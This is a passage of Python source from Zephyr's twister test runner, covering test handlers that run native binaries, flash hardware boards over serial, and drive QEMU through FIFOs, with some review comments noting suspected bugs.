        """(Re)loads entries from *cache_file*, replacing any current ones."""
        parsed = []
        with open(cache_file, 'r') as cache:
            for line_no, line in enumerate(cache):
                entry = CMakeCacheEntry.from_line(line, line_no)
                if entry:
                    parsed.append(entry)
        self._entries = OrderedDict((e.name, e) for e in parsed)

    def get(self, name, default=None):
        """Returns the value stored under *name*, or *default* if absent."""
        entry = self._entries.get(name)
        if entry is None:
            return default
        return entry.value

    def get_list(self, name, default=None):
        """Returns the value under *name* coerced to a list of strings."""
        if default is None:
            default = []
        entry = self._entries.get(name)
        if entry is None:
            return default
        value = entry.value
        if isinstance(value, list):
            return value
        if isinstance(value, str):
            # A non-empty scalar becomes a one-element list.
            return [value] if value else []
        msg = 'invalid value {} type {}'
        raise RuntimeError(msg.format(value, type(value)))

    def __contains__(self, name):
        return name in self._entries

    def __getitem__(self, name):
        return self._entries[name].value

    def __setitem__(self, name, entry):
        if not isinstance(entry, CMakeCacheEntry):
            msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
            raise TypeError(msg.format(type(entry), entry))
        self._entries[name] = entry

    def __delitem__(self, name):
        del self._entries[name]

    def __iter__(self):
        # Iterates over entry objects (not names), as before.
        return iter(self._entries.values())
class TwisterException(Exception):
    """Base class for all twister-specific errors."""
    pass
class TwisterRuntimeError(TwisterException):
    """Twister error raised at run time."""
    pass
class ConfigurationError(TwisterException):
    """Configuration-file error, reported as "<file>: <message>"."""

    def __init__(self, cfile, message):
        super().__init__(cfile + ": " + message)
class BuildError(TwisterException):
    """Raised when building a test configuration fails."""
    pass
class ExecutionError(TwisterException):
    """Raised when executing a test configuration fails."""
    pass
class HarnessImporter:
    """Instantiates a harness class from scripts/pylib/twister/harness.py."""

    def __init__(self, name):
        """Imports the harness module and instantiates *name* ("Test" if falsy)."""
        sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
        module = __import__("harness")
        class_name = name if name else "Test"
        harness_class = getattr(module, class_name)
        self.instance = harness_class()
class Handler:
    """Base class for running a built test instance and collecting results.

    Subclasses (binary, device, QEMU) implement handle(); this base holds
    shared state, process termination, and result post-processing.
    """

    def __init__(self, instance, type_str="build"):
        """Constructor
        """
        self.state = "waiting"
        self.run = False
        self.type_str = type_str
        self.binary = None
        self.pid_fn = None          # path of a pid file, when the runner writes one
        self.call_make_run = False
        self.name = instance.name
        self.instance = instance
        # Per-platform multiplier scales the suite's base timeout.
        self.timeout = math.ceil(instance.testsuite.timeout * instance.platform.timeout_multiplier)
        self.sourcedir = instance.testsuite.source_dir
        self.build_dir = instance.build_dir
        self.log = os.path.join(self.build_dir, "handler.log")
        self.returncode = 0
        self.generator = None
        self.generator_cmd = None
        self.suite_name_check = True
        self.args = []
        self.terminated = False     # set by terminate() so callers can tell a kill from a crash

    def record(self, harness):
        # Appends the harness's recorded rows to <build_dir>/recording.csv,
        # writing the field names as a header row first.
        # NOTE(review): csv.writer's second positional parameter is `dialect`,
        # so passing harness.fieldnames there looks unintended (DictWriter is
        # the API that takes fieldnames) -- confirm before relying on it.
        if harness.recording:
            filename = os.path.join(self.build_dir, "recording.csv")
            with open(filename, "at") as csvfile:
                cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
                cw.writerow(harness.fieldnames)
                for instance in harness.recording:
                    cw.writerow(instance)

    def terminate(self, proc):
        """Terminates *proc* and its whole child tree, then marks self.terminated."""
        # encapsulate terminate functionality so we do it consistently where ever
        # we might want to terminate the proc. We need try_kill_process_by_pid
        # because of both how newer ninja (1.6.0 or greater) and .NET / renode
        # work. Newer ninja's don't seem to pass SIGTERM down to the children
        # so we need to use try_kill_process_by_pid.
        for child in psutil.Process(proc.pid).children(recursive=True):
            try:
                os.kill(child.pid, signal.SIGTERM)
            except ProcessLookupError:
                # Child already exited between enumeration and kill.
                pass
        proc.terminate()
        # sleep for a while before attempting to kill
        time.sleep(0.5)
        proc.kill()
        self.terminated = True

    def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
        """
        If test suite names was found in test's C source code, then verify if
        detected suite names from output correspond to expected suite names
        (and not in reverse).
        """
        expected_suite_names = self.instance.testsuite.ztest_suite_names
        # Only meaningful for passing runs that declared expected names.
        if not expected_suite_names or \
                not harness_state == "passed":
            return
        if not detected_suite_names:
            self._missing_suite_name(expected_suite_names, handler_time)
        for detected_suite_name in detected_suite_names:
            if detected_suite_name not in expected_suite_names:
                self._missing_suite_name(expected_suite_names, handler_time)
                break

    def _missing_suite_name(self, expected_suite_names, handler_time):
        """
        Change result of performed test if problem with missing or unpropper
        suite name was occurred.
        """
        self.instance.status = "failed"
        self.instance.execution_time = handler_time
        for tc in self.instance.testcases:
            tc.status = "failed"
        self.instance.reason = f"Testsuite mismatch"
        logger.debug("Test suite names were not printed or some of them in " \
                     "output do not correspond with expected: %s",
                     str(expected_suite_names))

    def _final_handle_actions(self, harness, handler_time):
        """Post-run checks shared by all handlers: suite-name and RunID
        verification, then recording of harness output."""
        # only for Ztest tests:
        harness_class_name = type(harness).__name__
        if self.suite_name_check and harness_class_name == "Test":
            self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
        # A present-but-unmatched RunID means output came from a stale image.
        if not harness.matched_run_id and harness.run_id_exists:
            self.instance.status = "failed"
            self.instance.execution_time = handler_time
            self.instance.reason = "RunID mismatch"
            for tc in self.instance.testcases:
                tc.status = "failed"
        self.record(harness)
class BinaryHandler(Handler):
    """Runs a natively built test binary (e.g. native_posix) and watches its output."""

    def __init__(self, instance, type_str):
        """Constructor

        @param instance Test Instance
        """
        super().__init__(instance, type_str)
        self.call_west_flash = False
        # Tool options
        self.valgrind = False
        self.lsan = False
        self.asan = False
        self.ubsan = False
        self.coverage = False
        self.seed = None

    def try_kill_process_by_pid(self):
        # Kills the process whose pid was written to self.pid_fn, if any.
        if self.pid_fn:
            pid = int(open(self.pid_fn).read())
            os.unlink(self.pid_fn)
            self.pid_fn = None  # clear so we don't try to kill the binary twice
            try:
                os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Process already gone.
                pass

    def _output_reader(self, proc):
        # Runs in a short-lived thread so the main loop can bound the
        # blocking readline with a join timeout.
        self.line = proc.stdout.readline()

    def _output_handler(self, proc, harness):
        """Feeds the child's stdout to *harness* line by line until the
        harness reports a state or the timeout expires, then reaps the child."""
        if harness.is_pytest:
            harness.handle(None)
            return
        log_out_fp = open(self.log, "wt")
        timeout_extended = False
        timeout_time = time.time() + self.timeout
        while True:
            this_timeout = timeout_time - time.time()
            if this_timeout < 0:
                break
            # One reader thread per line: lets us time out a blocking readline.
            reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
            reader_t.start()
            reader_t.join(this_timeout)
            if not reader_t.is_alive():
                line = self.line
                logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
                log_out_fp.write(line.decode('utf-8'))
                log_out_fp.flush()
                harness.handle(line.decode('utf-8').rstrip())
                if harness.state:
                    # Result known: give the binary a short grace period
                    # (longer when coverage data must still be flushed).
                    if not timeout_extended or harness.capture_coverage:
                        timeout_extended = True
                        if harness.capture_coverage:
                            timeout_time = time.time() + 30
                        else:
                            timeout_time = time.time() + 2
            else:
                # readline still blocked at timeout; abandon the reader.
                reader_t.join(0)
                break
        try:
            # POSIX arch based ztests end on their own,
            # so let's give it up to 100ms to do so
            proc.wait(0.1)
        except subprocess.TimeoutExpired:
            self.terminate(proc)
        log_out_fp.close()

    def handle(self):
        """Builds the command line (make run / west flash / direct binary,
        optionally under valgrind), runs it, and translates the outcome into
        instance status/reason."""
        harness_name = self.instance.testsuite.harness.capitalize()
        harness_import = HarnessImporter(harness_name)
        harness = harness_import.instance
        harness.configure(self.instance)
        if self.call_make_run:
            command = [self.generator_cmd, "run"]
        elif self.call_west_flash:
            command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
        else:
            command = [self.binary]
        run_valgrind = False
        if self.valgrind:
            command = ["valgrind", "--error-exitcode=2",
                       "--leak-check=full",
                       "--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
                       "--log-file=" + self.build_dir + "/valgrind.log",
                       "--track-origins=yes",
                       ] + command
            run_valgrind = True
        # Only valid for native_posix
        if self.seed is not None:
            command = command + ["--seed="+str(self.seed)]
        logger.debug("Spawning process: " +
                     " ".join(shlex.quote(word) for word in command) + os.linesep +
                     "in directory: " + self.build_dir)
        start_time = time.time()
        env = os.environ.copy()
        if self.asan:
            env["ASAN_OPTIONS"] = "log_path=stdout:" + \
                                  env.get("ASAN_OPTIONS", "")
            if not self.lsan:
                # NOTE(review): when a pre-existing non-empty ASAN_OPTIONS was
                # appended above, this concatenation lacks a ':' separator
                # before "detect_leaks=0" -- confirm intended.
                env["ASAN_OPTIONS"] += "detect_leaks=0"
        if self.ubsan:
            env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
                                   env.get("UBSAN_OPTIONS", "")
        with subprocess.Popen(command, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
            logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
            t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
            t.start()
            t.join()
            if t.is_alive():
                self.terminate(proc)
                t.join()
            proc.wait()
            self.returncode = proc.returncode
            self.try_kill_process_by_pid()
        handler_time = time.time() - start_time
        if self.coverage:
            # NOTE(review): with shell=True and a list argument, only the first
            # element ("GCOV_PREFIX=...") is interpreted as the shell command
            # and the rest become shell positional args, so gcov is likely not
            # invoked as intended -- confirm.
            subprocess.call(["GCOV_PREFIX=" + self.build_dir,
                             "gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
        # FIXME: This is needed when killing the simulator, the console is
        # garbled and needs to be reset. Did not find a better way to do that.
        if sys.stdout.isatty():
            subprocess.call(["stty", "sane"])
        if harness.is_pytest:
            harness.pytest_run(self.log)
        self.instance.execution_time = handler_time
        if not self.terminated and self.returncode != 0:
            self.instance.status = "failed"
            if run_valgrind and self.returncode == 2:
                self.instance.reason = "Valgrind error"
            else:
                # When a process is killed, the default handler returns 128 + SIGTERM
                # so in that case the return code itself is not meaningful
                self.instance.reason = "Failed"
        elif harness.state:
            self.instance.status = harness.state
            if harness.state == "failed":
                self.instance.reason = "Failed"
        else:
            self.instance.status = "failed"
            self.instance.reason = "Timeout"
            self.instance.add_missing_testscases("blocked", "Timeout")
        self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
    """Flashes a test image onto attached hardware and monitors its serial output."""

    def __init__(self, instance, type_str):
        """Constructor

        @param instance Test Instance
        """
        super().__init__(instance, type_str)
        self.testplan = None    # set by the caller; provides DUTs and west options

    def monitor_serial(self, ser, halt_fileno, harness):
        """Reads the device's serial port line by line, feeding the harness,
        until the harness reports a state, *halt_fileno* becomes readable
        (flash failure signal), or the port times out."""
        if harness.is_pytest:
            harness.handle(None)
            return
        log_out_fp = open(self.log, "wt")
        ser_fileno = ser.fileno()
        readlist = [halt_fileno, ser_fileno]
        if self.coverage:
            # Set capture_coverage to True to indicate that right after
            # test results we should get coverage data, otherwise we exit
            # from the test.
            harness.capture_coverage = True
        ser.flush()
        while ser.isOpen():
            readable, _, _ = select.select(readlist, [], [], self.timeout)
            if halt_fileno in readable:
                logger.debug('halted')
                ser.close()
                break
            if ser_fileno not in readable:
                continue  # Timeout.
            serial_line = None
            try:
                serial_line = ser.readline()
            except TypeError:
                pass
            # ignore SerialException which may happen during the serial device
            # power off/on process.
            except serial.SerialException:
                pass
            # Just because ser_fileno has data doesn't mean an entire line
            # is available yet.
            if serial_line:
                sl = serial_line.decode('utf-8', 'ignore').lstrip()
                logger.debug("DEVICE: {0}".format(sl.rstrip()))
                log_out_fp.write(sl)
                log_out_fp.flush()
                harness.handle(sl.rstrip())
            if harness.state:
                # Result known; keep reading only if coverage data is expected.
                if not harness.capture_coverage:
                    ser.close()
                    break
        log_out_fp.close()

    def device_is_available(self, instance):
        """Returns a free DUT matching *instance*'s platform (and fixture, if
        required), atomically marking it busy; returns None when none is free."""
        device = instance.platform.name
        fixture = instance.testsuite.harness_config.get("fixture")
        for d in self.testplan.duts:
            if fixture and fixture not in d.fixtures:
                continue
            if d.platform != device or (d.serial is None and d.serial_pty is None):
                continue
            # Claim the DUT under its lock to avoid double allocation.
            d.lock.acquire()
            avail = False
            if d.available:
                d.available = 0
                d.counter += 1
                avail = True
            d.lock.release()
            if avail:
                return d
        return None

    def make_device_available(self, serial):
        """Marks the DUT owning *serial* (device path or pty command) free again."""
        for d in self.testplan.duts:
            if serial in [d.serial_pty, d.serial]:
                d.available = 1

    @staticmethod
    def run_custom_script(script, timeout):
        # Runs a user-provided pre/post script, logging failures; the script
        # is killed if it exceeds *timeout* seconds.
        with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
            try:
                stdout, stderr = proc.communicate(timeout=timeout)
                logger.debug(stdout.decode())
                if proc.returncode != 0:
                    logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
            except subprocess.TimeoutExpired:
                proc.kill()
                proc.communicate()
                logger.error("{} timed out".format(script))

    def handle(self):
        """Full device run: wait for a free DUT, build the flash command,
        open the serial port, flash, monitor output, and release the DUT."""
        runner = None
        # Block until a matching DUT is free.
        hardware = self.device_is_available(self.instance)
        while not hardware:
            logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
            time.sleep(1)
            hardware = self.device_is_available(self.instance)
        runner = hardware.runner or self.testplan.west_runner
        serial_pty = hardware.serial_pty
        ser_pty_process = None
        if serial_pty:
            # The DUT's serial is provided by a helper program speaking
            # through a pseudo-terminal rather than a device node.
            master, slave = pty.openpty()
            try:
                ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
            except subprocess.CalledProcessError as error:
                logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
                return
            serial_device = os.ttyname(slave)
        else:
            serial_device = hardware.serial
        logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
        if (self.testplan.west_flash is not None) or runner:
            command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
            command_extra_args = []
            # There are three ways this option is used.
            # 1) bare: --west-flash
            #    This results in options.west_flash == []
            # 2) with a value: --west-flash="--board-id=42"
            #    This results in options.west_flash == "--board-id=42"
            # 3) Multiple values: --west-flash="--board-id=42,--erase"
            #    This results in options.west_flash == "--board-id=42 --erase"
            if self.testplan.west_flash and self.testplan.west_flash != []:
                command_extra_args.extend(self.testplan.west_flash.split(','))
            if runner:
                command.append("--runner")
                command.append(runner)
                board_id = hardware.probe_id or hardware.id
                product = hardware.product
                if board_id is not None:
                    # Each runner has its own way of selecting a specific probe.
                    if runner == "pyocd":
                        command_extra_args.append("--board-id")
                        command_extra_args.append(board_id)
                    elif runner == "nrfjprog":
                        command_extra_args.append("--dev-id")
                        command_extra_args.append(board_id)
                    elif runner == "openocd" and product == "STM32 STLink":
                        command_extra_args.append("--cmd-pre-init")
                        command_extra_args.append("hla_serial %s" % (board_id))
                    elif runner == "openocd" and product == "STLINK-V3":
                        command_extra_args.append("--cmd-pre-init")
                        command_extra_args.append("hla_serial %s" % (board_id))
                    elif runner == "openocd" and product == "EDBG CMSIS-DAP":
                        command_extra_args.append("--cmd-pre-init")
                        command_extra_args.append("cmsis_dap_serial %s" % (board_id))
                    elif runner == "jlink":
                        command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
                    elif runner == "stm32cubeprogrammer":
                        command.append("--tool-opt=sn=%s" % (board_id))
            # Receive parameters from an runner_params field
            # of the specified hardware map file.
            for d in self.testplan.duts:
                if (d.platform == self.instance.platform.name) and d.runner_params:
                    for param in d.runner_params:
                        command.append(param)
            if command_extra_args != []:
                command.append('--')
                command.extend(command_extra_args)
        else:
            command = [self.generator_cmd, "-C", self.build_dir, "flash"]
        pre_script = hardware.pre_script
        post_flash_script = hardware.post_flash_script
        post_script = hardware.post_script
        if pre_script:
            self.run_custom_script(pre_script, 30)
        try:
            ser = serial.Serial(
                serial_device,
                baudrate=hardware.baud,
                parity=serial.PARITY_NONE,
                stopbits=serial.STOPBITS_ONE,
                bytesize=serial.EIGHTBITS,
                timeout=self.timeout
            )
        except serial.SerialException as e:
            # Cannot open the port: mark the run failed and release resources.
            self.instance.status = "failed"
            self.instance.reason = "Serial Device Error"
            logger.error("Serial device error: %s" % (str(e)))
            self.instance.add_missing_testscases("blocked", "Serial Device Error")
            if serial_pty and ser_pty_process:
                ser_pty_process.terminate()
                outs, errs = ser_pty_process.communicate()
                logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
            if serial_pty:
                self.make_device_available(serial_pty)
            else:
                self.make_device_available(serial_device)
            return
        ser.flush()
        harness_name = self.instance.testsuite.harness.capitalize()
        harness_import = HarnessImporter(harness_name)
        harness = harness_import.instance
        harness.configure(self.instance)
        # write_pipe signals the monitor thread to halt on flash failure.
        read_pipe, write_pipe = os.pipe()
        start_time = time.time()
        t = threading.Thread(target=self.monitor_serial, daemon=True,
                             args=(ser, read_pipe, harness))
        t.start()
        d_log = "{}/device.log".format(self.instance.build_dir)
        logger.debug('Flash command: %s', command)
        try:
            stdout = stderr = None
            with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
                try:
                    (stdout, stderr) = proc.communicate(timeout=30)
                    # ignore unencodable unicode chars
                    logger.debug(stdout.decode(errors = "ignore"))
                    if proc.returncode != 0:
                        self.instance.status = "error"
                        self.instance.reason = "Device issue (Flash error?)"
                        with open(d_log, "w") as dlog_fp:
                            dlog_fp.write(stderr.decode())
                        os.write(write_pipe, b'x')  # halt the thread
                except subprocess.TimeoutExpired:
                    proc.kill()
                    (stdout, stderr) = proc.communicate()
                    self.instance.status = "error"
                    self.instance.reason = "Device issue (Timeout)"
                    with open(d_log, "w") as dlog_fp:
                        dlog_fp.write(stderr.decode())
        except subprocess.CalledProcessError:
            os.write(write_pipe, b'x')  # halt the thread
        if post_flash_script:
            self.run_custom_script(post_flash_script, 30)
        t.join(self.timeout)
        if t.is_alive():
            logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
        if ser.isOpen():
            ser.close()
        if serial_pty:
            ser_pty_process.terminate()
            outs, errs = ser_pty_process.communicate()
            logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
        os.close(write_pipe)
        os.close(read_pipe)
        handler_time = time.time() - start_time
        if self.instance.status == "error":
            self.instance.add_missing_testscases("blocked", self.instance.reason)
        if harness.is_pytest:
            harness.pytest_run(self.log)
        # sometimes a test instance hasn't been executed successfully with no
        # status, in order to include it into final report,
        # so fill the results as blocked
        self.instance.add_missing_testscases("blocked")
        if harness.state:
            self.instance.status = harness.state
            if harness.state == "failed":
                self.instance.reason = "Failed"
        else:
            self.instance.execution_time = handler_time
        self._final_handle_actions(harness, handler_time)
        if post_script:
            self.run_custom_script(post_script, 30)
        # Release the DUT for the next test instance.
        if serial_pty:
            self.make_device_available(serial_pty)
        else:
            self.make_device_available(serial_device)
class QEMUHandler(Handler):
    """Spawns a thread to monitor QEMU output from pipes
    We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
    We need to do this as once qemu starts, it runs forever until killed.
    Test cases emit special messages to the console as they run, we check
    for these to collect whether the test passed or failed.
    """
    def __init__(self, instance, type_str):
        """Constructor
        @param instance Test instance
        @param type_str Handler type string, forwarded to the Handler base
        """
        super().__init__(instance, type_str)
        # Base name for the <fifo>.in / <fifo>.out pair used to talk to QEMU.
        self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
        # File QEMU writes its process id into.
        self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
        # Suites tagged "ignore_qemu_crash" tolerate a crashing QEMU:
        # a non-zero exit code and an unexpected EOF on the pipe are ignored.
        if "ignore_qemu_crash" in instance.testsuite.tags:
            self.ignore_qemu_crash = True
            self.ignore_unexpected_eof = True
        else:
            self.ignore_qemu_crash = False
            self.ignore_unexpected_eof = False
    @staticmethod
    def _get_cpu_time(pid):
        """get process CPU time.
        The guest virtual time in QEMU icount mode isn't host time and
        it's maintained by counting guest instructions, so we use QEMU
        process execution time to mostly simulate the time of guest OS.
        """
        # Sum of user and kernel CPU seconds consumed by the QEMU process.
        proc = psutil.Process(pid)
        cpu_time = proc.cpu_times()
        return cpu_time.user + cpu_time.system
    @staticmethod
    def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
                ignore_unexpected_eof=False):
        """Monitor-thread body: consume QEMU console output and drive harness.

        Reads the out-FIFO one character at a time, feeds complete lines to
        the harness, and resolves the final outcome (harness state,
        "timeout", "failed", "unexpected eof", "unexpected byte") into
        handler.instance.status / handler.instance.reason. On exit, QEMU is
        sent SIGTERM and both FIFOs are removed.
        """
        fifo_in = fifo_fn + ".in"
        fifo_out = fifo_fn + ".out"
        # These in/out nodes are named from QEMU's perspective, not ours
        # Recreate both FIFOs from scratch so no stale data is carried over.
        if os.path.exists(fifo_in):
            os.unlink(fifo_in)
        os.mkfifo(fifo_in)
        if os.path.exists(fifo_out):
            os.unlink(fifo_out)
        os.mkfifo(fifo_out)
        # We don't do anything with out_fp but we need to open it for
        # writing so that QEMU doesn't block, due to the way pipes work
        out_fp = open(fifo_in, "wb")
        # Disable internal buffering, we don't
        # want read() or poll() to ever block if there is data in there
        in_fp = open(fifo_out, "rb", buffering=0)
        log_out_fp = open(logfile, "wt")
        start_time = time.time()
        timeout_time = start_time + timeout
        p = select.poll()
        p.register(in_fp, select.POLLIN)
        out_state = None
        line = ""
        timeout_extended = False
        pid = 0
        # The pid file may not exist yet if QEMU hasn't fully started.
        if os.path.exists(pid_fn):
            pid = int(open(pid_fn).read())
        while True:
            this_timeout = int((timeout_time - time.time()) * 1000)
            if this_timeout < 0 or not p.poll(this_timeout):
                try:
                    if pid and this_timeout > 0:
                        #there's possibility we polled nothing because
                        #of not enough CPU time scheduled by host for
                        #QEMU process during p.poll(this_timeout)
                        cpu_time = QEMUHandler._get_cpu_time(pid)
                        if cpu_time < timeout and not out_state:
                            # Grant the remaining CPU-time budget and retry.
                            timeout_time = time.time() + (timeout - cpu_time)
                            continue
                except ProcessLookupError:
                    # QEMU process disappeared while we were querying it.
                    out_state = "failed"
                    break
                if not out_state:
                    out_state = "timeout"
                break
            # Pick up the pid as soon as QEMU has written its pid file.
            if pid == 0 and os.path.exists(pid_fn):
                pid = int(open(pid_fn).read())
            if harness.is_pytest:
                # pytest harnesses manage their own I/O; hand off and stop.
                harness.handle(None)
                out_state = harness.state
                break
            try:
                c = in_fp.read(1).decode("utf-8")
            except UnicodeDecodeError:
                # Test is writing something weird, fail
                out_state = "unexpected byte"
                break
            if c == "":
                # EOF, this shouldn't happen unless QEMU crashes
                if not ignore_unexpected_eof:
                    out_state = "unexpected eof"
                break
            line = line + c
            if c != "\n":
                continue
            # line contains a full line of data output from QEMU
            log_out_fp.write(line)
            log_out_fp.flush()
            line = line.strip()
            logger.debug(f"QEMU ({pid}): {line}")
            harness.handle(line)
            if harness.state:
                # if we have registered a fail make sure the state is not
                # overridden by a false success message coming from the
                # testsuite
                if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
                    out_state = harness.state
                # if we get some state, that means test is doing well, we reset
                # the timeout and wait for 2 more seconds to catch anything
                # printed late. We wait much longer if code
                # coverage is enabled since dumping this information can
                # take some time.
                if not timeout_extended or harness.capture_coverage:
                    timeout_extended = True
                    if harness.capture_coverage:
                        timeout_time = time.time() + 30
                    else:
                        timeout_time = time.time() + 2
            line = ""
        if harness.is_pytest:
            harness.pytest_run(logfile)
            out_state = harness.state
        handler_time = time.time() - start_time
        logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
        # Translate the monitor outcome into the instance status/reason.
        handler.instance.execution_time = handler_time
        if out_state == "timeout":
            handler.instance.status = "failed"
            handler.instance.reason = "Timeout"
        elif out_state == "failed":
            handler.instance.status = "failed"
            handler.instance.reason = "Failed"
        elif out_state in ['unexpected eof', 'unexpected byte']:
            handler.instance.status = "failed"
            handler.instance.reason = out_state
        else:
            # Status comes straight from the harness (e.g. "passed");
            # reason is a placeholder in that case.
            handler.instance.status = out_state
            handler.instance.reason = "Unknown"
        log_out_fp.close()
        out_fp.close()
        in_fp.close()
        if pid:
            try:
                # NOTE(review): this inner "if pid:" is redundant with the
                # enclosing check and could be removed.
                if pid:
                    os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Oh well, as long as it's dead! User probably sent Ctrl-C
                pass
        os.unlink(fifo_in)
        os.unlink(fifo_out)
    def handle(self):
        """Run the test under QEMU and collect its result.

        Spawns _thread() to consume QEMU console output via the FIFO pair,
        runs the generator's "run" target under self.timeout, then
        reconciles the process exit code with the harness state.
        """
        self.results = {}
        self.run = True
        # We pass this to QEMU which looks for fifos with .in and .out
        # suffixes.
        self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
        self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
        # Remove a stale pid file from an earlier run.
        if os.path.exists(self.pid_fn):
            os.unlink(self.pid_fn)
        self.log_fn = self.log
        harness_import = HarnessImporter(self.instance.testsuite.harness.capitalize())
        harness = harness_import.instance
        harness.configure(self.instance)
        self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
                                       args=(self, self.timeout, self.build_dir,
                                             self.log_fn, self.fifo_fn,
                                             self.pid_fn, self.results, harness,
                                             self.ignore_unexpected_eof))
        self.thread.daemon = True
        logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
        self.thread.start()
        if sys.stdout.isatty():
            # Restore sane terminal settings in case QEMU garbled them.
            subprocess.call(["stty", "sane"])
        logger.debug("Running %s (%s)" % (self.name, self.type_str))
        command = [self.generator_cmd]
        command += ["-C", self.build_dir, "run"]
        is_timeout = False
        qemu_pid = None
        with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
            logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
            try:
                proc.wait(self.timeout)
            except subprocess.TimeoutExpired:
                # sometimes QEMU can't handle SIGTERM signal correctly
                # in that case kill -9 QEMU process directly and leave
                # twister to judge testing result by console output
                is_timeout = True
                self.terminate(proc)
                if harness.state == "passed":
                    self.returncode = 0
                else:
                    self.returncode = proc.returncode
            else:
                if os.path.exists(self.pid_fn):
                    qemu_pid = int(open(self.pid_fn).read())
                logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
                self.returncode = proc.returncode
            # Need to wait for harness to finish processing
            # output from QEMU. Otherwise it might miss some
            # error messages.
            # NOTE(review): join(0) only polls the thread, it does not
            # actually wait -- confirm whether a real timeout was intended.
            self.thread.join(0)
            if self.thread.is_alive():
                logger.debug("Timed out while monitoring QEMU output")
            if os.path.exists(self.pid_fn):
                qemu_pid = int(open(self.pid_fn).read())
                os.unlink(self.pid_fn)
        logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
        # A crash (non-zero exit) or a harness that never reported any state
        # marks the instance failed, unless crashes are explicitly ignored.
        if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
            self.instance.status = "failed"
            if is_timeout:
                self.instance.reason = "Timeout"
            else:
                self.instance.reason = "Exited with {}".format(self.returncode)
            self.instance.add_missing_testscases("blocked")
        self._final_handle_actions(harness, 0)
    def get_fifo(self):
        """Return the base path of the FIFO pair used to talk to QEMU."""
        return self.fifo_fn
class SizeCalculator:
    """Compute RAM and ROM usage of a Zephyr ELF image.

    The binary's section table (as reported by ``objdump -h``) is walked and
    every non-zero-sized section is classified as:

      * ``alloc``   -- occupies RAM only (no load image)
      * ``rw``      -- occupies both ROM (initial image) and RAM
      * ``ro``      -- occupies ROM; also copied to RAM on non-XIP targets
      * ``unknown`` -- anything else; flagged as unrecognized unless the
                      caller listed it in ``extra_sections``
    """

    # Sections that only occupy RAM at runtime.
    alloc_sections = [
        "bss",
        "noinit",
        "app_bss",
        "app_noinit",
        "ccm_bss",
        "ccm_noinit"
    ]

    # Sections counted against both ROM (initial image) and RAM.
    # NOTE: the original list contained 'log_const_sections' twice; the
    # duplicate has been dropped (membership checks are unaffected).
    rw_sections = [
        "datas",
        "initlevel",
        "exceptions",
        "initshell",
        "_static_thread_data_area",
        "k_timer_area",
        "k_mem_slab_area",
        "k_mem_pool_area",
        "sw_isr_table",
        "k_sem_area",
        "k_mutex_area",
        "app_shmem_regions",
        "_k_fifo_area",
        "_k_lifo_area",
        "k_stack_area",
        "k_msgq_area",
        "k_mbox_area",
        "k_pipe_area",
        "net_if_area",
        "net_if_dev_area",
        "net_l2_area",
        "net_l2_data",
        "k_queue_area",
        "_net_buf_pool_area",
        "app_datas",
        "kobject_data",
        "mmu_tables",
        "app_pad",
        "priv_stacks",
        "ccm_data",
        "usb_descriptor",
        "usb_data", "usb_bos_desc",
        "uart_mux",
        'log_backends_sections',
        'log_dynamic_sections',
        'log_const_sections',
        "app_smem",
        'shell_root_cmds_sections',
        "font_entry_sections",
        "priv_stacks_noinit",
        "_GCOV_BSS_SECTION_NAME",
        "gcov",
        "nocache",
        "devices",
        "k_heap_area",
    ]

    # These get copied into RAM only on non-XIP
    ro_sections = [
        "rom_start",
        "text",
        "ctors",
        "init_array",
        "reset",
        "z_object_assignment_area",
        "rodata",
        "net_l2",
        "vector",
        "sw_isr_table",
        "settings_handler_static_area",
        "bt_l2cap_fixed_chan_area",
        "bt_l2cap_br_fixed_chan_area",
        "bt_gatt_service_static_area",
        "vectors",
        "net_socket_register_area",
        "net_ppp_proto",
        "shell_area",
        "tracing_backend_area",
        "ppp_protocol_handler_area",
    ]

    def __init__(self, filename, extra_sections):
